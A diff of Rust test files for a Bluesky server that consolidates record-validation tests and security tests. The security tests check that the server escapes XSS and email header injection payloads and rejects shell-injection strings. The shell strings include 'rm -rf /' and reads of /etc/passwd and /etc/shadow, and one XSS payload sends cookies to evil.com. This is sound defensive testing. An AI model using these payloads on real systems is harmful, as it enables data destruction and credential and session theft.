let profile = json!({
let description_too_long = json!({
"$type": "app.bsky.actor.profile",
"description": long_desc
"description": "d".repeat(2561)
});
let result = validator.validate(&profile, "app.bsky.actor.profile");
assert!(
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description")
);
assert!(matches!(validator.validate(&description_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "description"));
}
#[test]
fn test_validate_like_valid() {
fn test_like_and_repost_validation() {
let validator = RecordValidator::new();
let like = json!({
let valid_like = json!({
"$type": "app.bsky.feed.like",
"subject": {
"uri": "at://did:plc:test/app.bsky.feed.post/123",
@@ -197,39 +127,24 @@ fn test_validate_like_valid() {
},
"createdAt": now()
});
let result = validator.validate(&like, "app.bsky.feed.like");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&valid_like, "app.bsky.feed.like").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_like_missing_subject() {
let validator = RecordValidator::new();
let like = json!({
let missing_subject = json!({
"$type": "app.bsky.feed.like",
"createdAt": now()
});
let result = validator.validate(&like, "app.bsky.feed.like");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
}
assert!(matches!(validator.validate(&missing_subject, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f == "subject"));
#[test]
fn test_validate_like_missing_subject_uri() {
let validator = RecordValidator::new();
let like = json!({
let missing_subject_uri = json!({
"$type": "app.bsky.feed.like",
"subject": {
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
},
"createdAt": now()
});
let result = validator.validate(&like, "app.bsky.feed.like");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri")));
}
assert!(matches!(validator.validate(&missing_subject_uri, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f.contains("uri")));
#[test]
fn test_validate_like_invalid_subject_uri() {
let validator = RecordValidator::new();
let like = json!({
let invalid_subject_uri = json!({
"$type": "app.bsky.feed.like",
"subject": {
"uri": "https://example.com/not-at-uri",
@@ -237,16 +152,9 @@ fn test_validate_like_invalid_subject_uri() {
},
"createdAt": now()
});
let result = validator.validate(&like, "app.bsky.feed.like");
assert!(
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri"))
);
}
assert!(matches!(validator.validate(&invalid_subject_uri, "app.bsky.feed.like"), Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")));
#[test]
fn test_validate_repost_valid() {
let validator = RecordValidator::new();
let repost = json!({
let valid_repost = json!({
"$type": "app.bsky.feed.repost",
"subject": {
"uri": "at://did:plc:test/app.bsky.feed.post/123",
@@ -254,355 +162,220 @@ fn test_validate_repost_valid() {
},
"createdAt": now()
});
let result = validator.validate(&repost, "app.bsky.feed.repost");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&valid_repost, "app.bsky.feed.repost").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_repost_missing_subject() {
let validator = RecordValidator::new();
let repost = json!({
let repost_missing_subject = json!({
"$type": "app.bsky.feed.repost",
"createdAt": now()
});
let result = validator.validate(&repost, "app.bsky.feed.repost");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
assert!(matches!(validator.validate(&repost_missing_subject, "app.bsky.feed.repost"), Err(ValidationError::MissingField(f)) if f == "subject"));
}
#[test]
fn test_validate_follow_valid() {
fn test_follow_and_block_validation() {
let validator = RecordValidator::new();
let follow = json!({
let valid_follow = json!({
"$type": "app.bsky.graph.follow",
"subject": "did:plc:test12345",
"createdAt": now()
});
let result = validator.validate(&follow, "app.bsky.graph.follow");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&valid_follow, "app.bsky.graph.follow").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_follow_missing_subject() {
let validator = RecordValidator::new();
let follow = json!({
let missing_follow_subject = json!({
"$type": "app.bsky.graph.follow",
"createdAt": now()
});
let result = validator.validate(&follow, "app.bsky.graph.follow");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
}
assert!(matches!(validator.validate(&missing_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::MissingField(f)) if f == "subject"));
#[test]
fn test_validate_follow_invalid_subject() {
let validator = RecordValidator::new();
let follow = json!({
let invalid_follow_subject = json!({
"$type": "app.bsky.graph.follow",
"subject": "not-a-did",
"createdAt": now()
});
let result = validator.validate(&follow, "app.bsky.graph.follow");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
}
assert!(matches!(validator.validate(&invalid_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
#[test]
fn test_validate_block_valid() {
let validator = RecordValidator::new();
let block = json!({
let valid_block = json!({
"$type": "app.bsky.graph.block",
"subject": "did:plc:blocked123",
"createdAt": now()
});
let result = validator.validate(&block, "app.bsky.graph.block");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&valid_block, "app.bsky.graph.block").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_block_invalid_subject() {
let validator = RecordValidator::new();
let block = json!({
let invalid_block_subject = json!({
"$type": "app.bsky.graph.block",
"subject": "not-a-did",
"createdAt": now()
});
let result = validator.validate(&block, "app.bsky.graph.block");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
assert!(matches!(validator.validate(&invalid_block_subject, "app.bsky.graph.block"), Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
}
#[test]
fn test_validate_list_valid() {
fn test_list_and_graph_records_validation() {
let validator = RecordValidator::new();
let list = json!({
let valid_list = json!({
"$type": "app.bsky.graph.list",
"name": "My List",
"purpose": "app.bsky.graph.defs#modlist",
"createdAt": now()
});
let result = validator.validate(&list, "app.bsky.graph.list");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&valid_list, "app.bsky.graph.list").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_list_name_too_long() {
let validator = RecordValidator::new();
let long_name = "n".repeat(65);
let list = json!({
let list_name_too_long = json!({
"$type": "app.bsky.graph.list",
"name": long_name,
"name": "n".repeat(65),
"purpose": "app.bsky.graph.defs#modlist",
"createdAt": now()
});
let result = validator.validate(&list, "app.bsky.graph.list");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
}
assert!(matches!(validator.validate(&list_name_too_long, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name"));
#[test]
fn test_validate_list_empty_name() {
let validator = RecordValidator::new();
let list = json!({
let list_empty_name = json!({
"$type": "app.bsky.graph.list",
"name": "",
"purpose": "app.bsky.graph.defs#modlist",
"createdAt": now()
});
let result = validator.validate(&list, "app.bsky.graph.list");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
assert!(matches!(validator.validate(&list_empty_name, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name"));
let valid_list_item = json!({
"$type": "app.bsky.graph.listitem",
"subject": "did:plc:test123",
"list": "at://did:plc:owner/app.bsky.graph.list/mylist",
"createdAt": now()
});
assert_eq!(validator.validate(&valid_list_item, "app.bsky.graph.listitem").unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_feed_generator_valid() {
fn test_misc_record_types_validation() {
let validator = RecordValidator::new();
let generator = json!({
let valid_generator = json!({
"$type": "app.bsky.feed.generator",
"did": "did:web:example.com",
"displayName": "My Feed",
"createdAt": now()
});
let result = validator.validate(&generator, "app.bsky.feed.generator");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&valid_generator, "app.bsky.feed.generator").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_feed_generator_displayname_too_long() {
let validator = RecordValidator::new();
let long_name = "f".repeat(241);
let generator = json!({
let generator_displayname_too_long = json!({
"$type": "app.bsky.feed.generator",
"did": "did:web:example.com",
"displayName": long_name,
"displayName": "f".repeat(241),
"createdAt": now()
});
let result = validator.validate(&generator, "app.bsky.feed.generator");
assert!(
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")
);
}
assert!(matches!(validator.validate(&generator_displayname_too_long, "app.bsky.feed.generator"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
#[test]
fn test_validate_unknown_type_returns_unknown() {
let validator = RecordValidator::new();
let custom = json!({
"$type": "com.custom.record",
"data": "test"
});
let result = validator.validate(&custom, "com.custom.record");
assert_eq!(result.unwrap(), ValidationStatus::Unknown);
}
#[test]
fn test_validate_unknown_type_strict_rejects() {
let validator = RecordValidator::new().require_lexicon(true);
let custom = json!({
"$type": "com.custom.record",
"data": "test"
});
let result = validator.validate(&custom, "com.custom.record");
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
}
#[test]
fn test_validate_type_mismatch() {
let validator = RecordValidator::new();
let record = json!({
"$type": "app.bsky.feed.like",
"subject": {"uri": "at://test", "cid": "bafytest"},
"createdAt": now()
});
let result = validator.validate(&record, "app.bsky.feed.post");
assert!(
matches!(result, Err(ValidationError::TypeMismatch { expected, actual })
if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like")
);
}
#[test]
fn test_validate_missing_type() {
let validator = RecordValidator::new();
let record = json!({
"text": "Hello"
});
let result = validator.validate(&record, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::MissingType)));
}
#[test]
fn test_validate_not_object() {
let validator = RecordValidator::new();
let record = json!("just a string");
let result = validator.validate(&record, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
}
#[test]
fn test_validate_datetime_format_valid() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024-01-15T10:30:00.000Z"
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_datetime_with_offset() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024-01-15T10:30:00+05:30"
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_datetime_invalid_format() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024/01/15"
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(
result,
Err(ValidationError::InvalidDatetime { .. })
));
}
#[test]
fn test_validate_record_key_valid() {
assert!(validate_record_key("3k2n5j2").is_ok());
assert!(validate_record_key("valid-key").is_ok());
assert!(validate_record_key("valid_key").is_ok());
assert!(validate_record_key("valid.key").is_ok());
assert!(validate_record_key("valid~key").is_ok());
assert!(validate_record_key("self").is_ok());
}
#[test]
fn test_validate_record_key_empty() {
let result = validate_record_key("");
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
}
#[test]
fn test_validate_record_key_dot() {
assert!(validate_record_key(".").is_err());
assert!(validate_record_key("..").is_err());
}
#[test]
fn test_validate_record_key_invalid_chars() {
assert!(validate_record_key("invalid/key").is_err());
assert!(validate_record_key("invalid key").is_err());
assert!(validate_record_key("invalid@key").is_err());
assert!(validate_record_key("invalid#key").is_err());
}
#[test]
fn test_validate_record_key_too_long() {
let long_key = "k".repeat(513);
let result = validate_record_key(&long_key);
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
}
#[test]
fn test_validate_record_key_at_max_length() {
let max_key = "k".repeat(512);
assert!(validate_record_key(&max_key).is_ok());
}
#[test]
fn test_validate_collection_nsid_valid() {
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
assert!(validate_collection_nsid("a.b.c").is_ok());
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
}
#[test]
fn test_validate_collection_nsid_empty() {
let result = validate_collection_nsid("");
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
}
#[test]
fn test_validate_collection_nsid_too_few_segments() {
assert!(validate_collection_nsid("a").is_err());
assert!(validate_collection_nsid("a.b").is_err());
}
#[test]
fn test_validate_collection_nsid_empty_segment() {
assert!(validate_collection_nsid("a..b.c").is_err());
assert!(validate_collection_nsid(".a.b.c").is_err());
assert!(validate_collection_nsid("a.b.c.").is_err());
}
#[test]
fn test_validate_collection_nsid_invalid_chars() {
assert!(validate_collection_nsid("a.b.c/d").is_err());
assert!(validate_collection_nsid("a.b.c_d").is_err());
assert!(validate_collection_nsid("a.b.c@d").is_err());
}
#[test]
fn test_validate_threadgate() {
let validator = RecordValidator::new();
let gate = json!({
let valid_threadgate = json!({
"$type": "app.bsky.feed.threadgate",
"post": "at://did:plc:test/app.bsky.feed.post/123",
"createdAt": now()
});
let result = validator.validate(&gate, "app.bsky.feed.threadgate");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&valid_threadgate, "app.bsky.feed.threadgate").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_labeler_service() {
let validator = RecordValidator::new();
let labeler = json!({
let valid_labeler = json!({
"$type": "app.bsky.labeler.service",
"policies": {
"labelValues": ["spam", "nsfw"]
},
"createdAt": now()
});
let result = validator.validate(&labeler, "app.bsky.labeler.service");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
assert_eq!(validator.validate(&valid_labeler, "app.bsky.labeler.service").unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_list_item() {
fn test_type_and_format_validation() {
let validator = RecordValidator::new();
let item = json!({
"$type": "app.bsky.graph.listitem",
"subject": "did:plc:test123",
"list": "at://did:plc:owner/app.bsky.graph.list/mylist",
let strict_validator = RecordValidator::new().require_lexicon(true);
let custom_record = json!({
"$type": "com.custom.record",
"data": "test"
});
assert_eq!(validator.validate(&custom_record, "com.custom.record").unwrap(), ValidationStatus::Unknown);
assert!(matches!(strict_validator.validate(&custom_record, "com.custom.record"), Err(ValidationError::UnknownType(_))));
let type_mismatch = json!({
"$type": "app.bsky.feed.like",
"subject": {"uri": "at://test", "cid": "bafytest"},
"createdAt": now()
});
let result = validator.validate(&item, "app.bsky.graph.listitem");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
assert!(matches!(
validator.validate(&type_mismatch, "app.bsky.feed.post"),
Err(ValidationError::TypeMismatch { expected, actual }) if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like"
));
let missing_type = json!({
"text": "Hello"
});
assert!(matches!(validator.validate(&missing_type, "app.bsky.feed.post"), Err(ValidationError::MissingType)));
let not_object = json!("just a string");
assert!(matches!(validator.validate(&not_object, "app.bsky.feed.post"), Err(ValidationError::InvalidRecord(_))));
let valid_datetime = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024-01-15T10:30:00.000Z"
});
assert_eq!(validator.validate(&valid_datetime, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
let datetime_with_offset = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024-01-15T10:30:00+05:30"
});
assert_eq!(validator.validate(&datetime_with_offset, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
let invalid_datetime = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024/01/15"
});
assert!(matches!(validator.validate(&invalid_datetime, "app.bsky.feed.post"), Err(ValidationError::InvalidDatetime { .. })));
}
#[test]
fn test_record_key_validation() {
assert!(validate_record_key("3k2n5j2").is_ok());
assert!(validate_record_key("valid-key").is_ok());
assert!(validate_record_key("valid_key").is_ok());
assert!(validate_record_key("valid.key").is_ok());
assert!(validate_record_key("valid~key").is_ok());
assert!(validate_record_key("self").is_ok());
assert!(matches!(validate_record_key(""), Err(ValidationError::InvalidRecord(_))));
assert!(validate_record_key(".").is_err());
assert!(validate_record_key("..").is_err());
assert!(validate_record_key("invalid/key").is_err());
assert!(validate_record_key("invalid key").is_err());
assert!(validate_record_key("invalid@key").is_err());
assert!(validate_record_key("invalid#key").is_err());
assert!(matches!(validate_record_key(&"k".repeat(513)), Err(ValidationError::InvalidRecord(_))));
assert!(validate_record_key(&"k".repeat(512)).is_ok());
}
#[test]
fn test_collection_nsid_validation() {
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
assert!(validate_collection_nsid("a.b.c").is_ok());
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
assert!(matches!(validate_collection_nsid(""), Err(ValidationError::InvalidRecord(_))));
assert!(validate_collection_nsid("a").is_err());
assert!(validate_collection_nsid("a.b").is_err());
assert!(validate_collection_nsid("a..b.c").is_err());
assert!(validate_collection_nsid(".a.b.c").is_err());
assert!(validate_collection_nsid("a.b.c.").is_err());
assert!(validate_collection_nsid("a.b.c/d").is_err());
assert!(validate_collection_nsid("a.b.c_d").is_err());
assert!(validate_collection_nsid("a.b.c@d").is_err());
}

View File

@@ -4,145 +4,70 @@ use bspds::notifications::{SendError, is_valid_phone_number, sanitize_header_val
use bspds::oauth::templates::{error_page, login_page, success_page};
#[test]
fn test_sanitize_header_value_removes_crlf() {
fn test_header_injection_sanitization() {
let malicious = "Injected\r\nBcc: attacker@evil.com";
let sanitized = sanitize_header_value(malicious);
assert!(!sanitized.contains('\r'), "CR should be removed");
assert!(!sanitized.contains('\n'), "LF should be removed");
assert!(
sanitized.contains("Injected"),
"Original content should be preserved"
);
assert!(
sanitized.contains("Bcc:"),
"Text after newline should be on same line (no header injection)"
);
}
assert!(!sanitized.contains('\r') && !sanitized.contains('\n'));
assert!(sanitized.contains("Injected") && sanitized.contains("Bcc:"));
#[test]
fn test_sanitize_header_value_preserves_content() {
let normal = "Normal Subject Line";
let sanitized = sanitize_header_value(normal);
assert_eq!(sanitized, "Normal Subject Line");
}
assert_eq!(sanitize_header_value(normal), "Normal Subject Line");
#[test]
fn test_sanitize_header_value_trims_whitespace() {
let padded = " Subject ";
let sanitized = sanitize_header_value(padded);
assert_eq!(sanitized, "Subject");
}
assert_eq!(sanitize_header_value(padded), "Subject");
#[test]
fn test_sanitize_header_value_handles_multiple_newlines() {
let input = "Line1\r\nLine2\nLine3\rLine4";
let sanitized = sanitize_header_value(input);
assert!(!sanitized.contains('\r'), "CR should be removed");
assert!(!sanitized.contains('\n'), "LF should be removed");
assert!(
sanitized.contains("Line1"),
"Content before newlines preserved"
);
assert!(
sanitized.contains("Line4"),
"Content after newlines preserved"
);
}
let multi_newline = "Line1\r\nLine2\nLine3\rLine4";
let sanitized = sanitize_header_value(multi_newline);
assert!(!sanitized.contains('\r') && !sanitized.contains('\n'));
assert!(sanitized.contains("Line1") && sanitized.contains("Line4"));
#[test]
fn test_email_header_injection_sanitization() {
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
let sanitized = sanitize_header_value(header_injection);
let lines: Vec<&str> = sanitized.split("\r\n").collect();
assert_eq!(lines.len(), 1, "Should be a single line after sanitization");
assert!(
sanitized.contains("Normal Subject"),
"Original content preserved"
);
assert!(
sanitized.contains("Bcc:"),
"Content after CRLF preserved as same line text"
);
assert!(
sanitized.contains("X-Injected:"),
"All content on same line"
);
assert_eq!(sanitized.split("\r\n").count(), 1);
assert!(sanitized.contains("Normal Subject") && sanitized.contains("Bcc:") && sanitized.contains("X-Injected:"));
let with_null = "client\0id";
assert!(sanitize_header_value(with_null).contains("client"));
let long_input = "x".repeat(10000);
assert!(!sanitize_header_value(&long_input).is_empty());
}
#[test]
fn test_valid_phone_number_accepts_correct_format() {
fn test_phone_number_validation() {
assert!(is_valid_phone_number("+1234567890"));
assert!(is_valid_phone_number("+12025551234"));
assert!(is_valid_phone_number("+442071234567"));
assert!(is_valid_phone_number("+4915123456789"));
assert!(is_valid_phone_number("+1"));
}
#[test]
fn test_valid_phone_number_rejects_missing_plus() {
assert!(!is_valid_phone_number("1234567890"));
assert!(!is_valid_phone_number("12025551234"));
}
#[test]
fn test_valid_phone_number_rejects_empty() {
assert!(!is_valid_phone_number(""));
}
#[test]
fn test_valid_phone_number_rejects_just_plus() {
assert!(!is_valid_phone_number("+"));
}
#[test]
fn test_valid_phone_number_rejects_too_long() {
assert!(!is_valid_phone_number("+12345678901234567890123"));
}
#[test]
fn test_valid_phone_number_rejects_letters() {
assert!(!is_valid_phone_number("+abc123"));
assert!(!is_valid_phone_number("+1234abc"));
assert!(!is_valid_phone_number("+a"));
}
#[test]
fn test_valid_phone_number_rejects_spaces() {
assert!(!is_valid_phone_number("+1234 5678"));
assert!(!is_valid_phone_number("+ 1234567890"));
assert!(!is_valid_phone_number("+1 "));
}
#[test]
fn test_valid_phone_number_rejects_special_chars() {
assert!(!is_valid_phone_number("+123-456-7890"));
assert!(!is_valid_phone_number("+1(234)567890"));
assert!(!is_valid_phone_number("+1.234.567.890"));
}
#[test]
fn test_signal_recipient_command_injection_blocked() {
let malicious_inputs = vec![
"+123; rm -rf /",
"+123 && cat /etc/passwd",
"+123`id`",
"+123$(whoami)",
"+123|cat /etc/shadow",
"+123\n--help",
"+123\r\n--version",
"+123--help",
];
for input in malicious_inputs {
assert!(
!is_valid_phone_number(input),
"Malicious input '{}' should be rejected",
input
);
for malicious in ["+123; rm -rf /", "+123 && cat /etc/passwd", "+123`id`",
"+123$(whoami)", "+123|cat /etc/shadow", "+123\n--help",
"+123\r\n--version", "+123--help"] {
assert!(!is_valid_phone_number(malicious), "Command injection '{}' should be rejected", malicious);
}
}
#[test]
fn test_image_file_size_limit_enforced() {
fn test_image_file_size_limits() {
let processor = ImageProcessor::new();
let oversized_data: Vec<u8> = vec![0u8; 11 * 1024 * 1024];
let result = processor.process(&oversized_data, "image/jpeg");
@@ -156,321 +81,109 @@ fn test_image_file_size_limit_enforced() {
}
Ok(_) => panic!("Should reject files over size limit"),
}
}
#[test]
fn test_image_file_size_limit_configurable() {
let processor = ImageProcessor::new().with_max_file_size(1024);
let data: Vec<u8> = vec![0u8; 2048];
let result = processor.process(&data, "image/jpeg");
assert!(result.is_err(), "Should reject files over configured limit");
assert!(processor.process(&data, "image/jpeg").is_err());
}
#[test]
fn test_oauth_template_xss_escaping_client_id() {
let malicious_client_id = "<script>alert('xss')</script>";
let html = login_page(malicious_client_id, None, None, "test-uri", None, None);
assert!(!html.contains("<script>"), "Script tags should be escaped");
assert!(
html.contains("&lt;script&gt;"),
"HTML entities should be used for escaping"
);
fn test_oauth_template_xss_protection() {
let html = login_page("<script>alert('xss')</script>", None, None, "test-uri", None, None);
assert!(!html.contains("<script>") && html.contains("&lt;script&gt;"));
let html = login_page("client123", Some("<img src=x onerror=alert('xss')>"), None, "test-uri", None, None);
assert!(!html.contains("<img ") && html.contains("&lt;img"));
let html = login_page("client123", None, Some("\"><script>alert('xss')</script>"), "test-uri", None, None);
assert!(!html.contains("<script>"));
let html = login_page("client123", None, None, "test-uri",
Some("<script>document.location='http://evil.com?c='+document.cookie</script>"), None);
assert!(!html.contains("<script>"));
let html = login_page("client123", None, None, "test-uri", None,
Some("\" onfocus=\"alert('xss')\" autofocus=\""));
assert!(!html.contains("onfocus=\"alert") && html.contains("&quot;"));
let html = login_page("client123", None, None, "\" onmouseover=\"alert('xss')\"", None, None);
assert!(!html.contains("onmouseover=\"alert"));
let html = error_page("<script>steal()</script>", Some("<img src=x onerror=evil()>"));
assert!(!html.contains("<script>") && !html.contains("<img "));
let html = success_page(Some("<script>steal_session()</script>"));
assert!(!html.contains("<script>"));
for (page, name) in [
(login_page("client", None, None, "uri", None, None), "login"),
(error_page("err", None), "error"),
(success_page(None), "success"),
] {
assert!(!page.contains("javascript:"), "{} page has javascript: URL", name);
}
let html = login_page("client123", None, None, "javascript:alert('xss')//", None, None);
assert!(html.contains("action=\"/oauth/authorize\""));
}
#[test]
fn test_oauth_template_xss_escaping_client_name() {
let malicious_client_name = "<img src=x onerror=alert('xss')>";
let html = login_page(
"client123",
Some(malicious_client_name),
None,
"test-uri",
None,
None,
);
assert!(!html.contains("<img "), "IMG tags should be escaped");
assert!(
html.contains("&lt;img"),
"IMG tag should be escaped as HTML entity"
);
fn test_oauth_template_html_escaping() {
let html = login_page("client&test", None, None, "test-uri", None, None);
assert!(html.contains("&amp;") && !html.contains("client&test"));
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
assert!(html.contains("&quot;") || html.contains("&#34;"));
assert!(html.contains("&#39;") || html.contains("&apos;"));
let html = login_page("client<test>more", None, None, "test-uri", None, None);
assert!(html.contains("&lt;") && html.contains("&gt;") && !html.contains("<test>"));
let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"),
"valid-uri", None, Some("user@example.com"));
assert!(html.contains("my-safe-client") || html.contains("My Safe App"));
assert!(html.contains("read write") || html.contains("read"));
assert!(html.contains("user@example.com"));
let html = login_page("client", None, None, "\" onclick=\"alert('csrf')", None, None);
assert!(!html.contains("onclick=\"alert"));
let html = login_page("客户端 クライアント", None, None, "test-uri", None, None);
assert!(html.contains("客户端") || html.contains("&#"));
}
#[test]
fn test_oauth_template_xss_escaping_scope() {
let malicious_scope = "\"><script>alert('xss')</script>";
let html = login_page(
"client123",
None,
Some(malicious_scope),
"test-uri",
None,
None,
);
assert!(
!html.contains("<script>"),
"Script tags in scope should be escaped"
);
}
#[test]
fn test_oauth_template_xss_escaping_error_message() {
let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>";
let html = login_page(
"client123",
None,
None,
"test-uri",
Some(malicious_error),
None,
);
assert!(
!html.contains("<script>"),
"Script tags in error should be escaped"
);
}
#[test]
fn test_oauth_template_xss_escaping_login_hint() {
let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\"";
let html = login_page(
"client123",
None,
None,
"test-uri",
None,
Some(malicious_hint),
);
assert!(
!html.contains("onfocus=\"alert"),
"Event handlers should be escaped in login hint"
);
assert!(html.contains("&quot;"), "Quotes should be escaped");
}
#[test]
fn test_oauth_template_xss_escaping_request_uri() {
let malicious_uri = "\" onmouseover=\"alert('xss')\"";
let html = login_page("client123", None, None, malicious_uri, None, None);
assert!(
!html.contains("onmouseover=\"alert"),
"Event handlers should be escaped in request_uri"
);
}
#[test]
fn test_oauth_error_page_xss_escaping() {
let malicious_error = "<script>steal()</script>";
let malicious_desc = "<img src=x onerror=evil()>";
let html = error_page(malicious_error, Some(malicious_desc));
assert!(
!html.contains("<script>"),
"Script tags should be escaped in error page"
);
assert!(
!html.contains("<img "),
"IMG tags should be escaped in error page"
);
}
#[test]
fn test_oauth_success_page_xss_escaping() {
let malicious_name = "<script>steal_session()</script>";
let html = success_page(Some(malicious_name));
assert!(
!html.contains("<script>"),
"Script tags should be escaped in success page"
);
}
#[test]
fn test_oauth_template_no_javascript_urls() {
let html = login_page("client123", None, None, "test-uri", None, None);
assert!(
!html.contains("javascript:"),
"Login page should not contain javascript: URLs"
);
let error_html = error_page("test_error", None);
assert!(
!error_html.contains("javascript:"),
"Error page should not contain javascript: URLs"
);
let success_html = success_page(None);
assert!(
!success_html.contains("javascript:"),
"Success page should not contain javascript: URLs"
);
}
#[test]
fn test_oauth_template_form_action_safe() {
let malicious_uri = "javascript:alert('xss')//";
let html = login_page("client123", None, None, malicious_uri, None, None);
assert!(
html.contains("action=\"/oauth/authorize\""),
"Form action should be fixed URL"
);
}
#[test]
fn test_send_error_types_have_display() {
fn test_send_error_display() {
let timeout = SendError::Timeout;
let max_retries = SendError::MaxRetriesExceeded("test".to_string());
let invalid_recipient = SendError::InvalidRecipient("bad recipient".to_string());
assert!(!format!("{}", timeout).is_empty());
assert!(!format!("{}", max_retries).is_empty());
assert!(!format!("{}", invalid_recipient).is_empty());
}
assert!(format!("{}", timeout).to_lowercase().contains("timeout"));
#[test]
fn test_send_error_timeout_message() {
let error = SendError::Timeout;
let msg = format!("{}", error);
assert!(
msg.to_lowercase().contains("timeout"),
"Timeout error should mention timeout"
);
}
let max_retries = SendError::MaxRetriesExceeded("Server returned 503".to_string());
let msg = format!("{}", max_retries);
assert!(!msg.is_empty());
assert!(msg.contains("503") || msg.contains("retries"));
#[test]
fn test_send_error_max_retries_includes_detail() {
let error = SendError::MaxRetriesExceeded("Server returned 503".to_string());
let msg = format!("{}", error);
assert!(
msg.contains("503") || msg.contains("retries"),
"MaxRetriesExceeded should include context"
);
let invalid = SendError::InvalidRecipient("bad recipient".to_string());
assert!(!format!("{}", invalid).is_empty());
}
#[tokio::test]
async fn test_check_signup_queue_accepts_session_jwt() {
async fn test_signup_queue_authentication() {
use common::{base_url, client, create_account_and_login};
let base = base_url().await;
let http_client = client();
let res = http_client.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
.send().await.unwrap();
assert_eq!(res.status(), reqwest::StatusCode::OK);
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["activated"], true);
let (token, _did) = create_account_and_login(&http_client).await;
let res = http_client
.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
let res = http_client.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
.header("Authorization", format!("Bearer {}", token))
.send()
.await
.unwrap();
assert_eq!(
res.status(),
reqwest::StatusCode::OK,
"Session JWTs should be accepted"
);
.send().await.unwrap();
assert_eq!(res.status(), reqwest::StatusCode::OK);
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["activated"], true);
}
#[tokio::test]
async fn test_check_signup_queue_no_auth() {
use common::{base_url, client};
let base = base_url().await;
let http_client = client();
let res = http_client
.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
.send()
.await
.unwrap();
assert_eq!(res.status(), reqwest::StatusCode::OK, "No auth should work");
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["activated"], true);
}
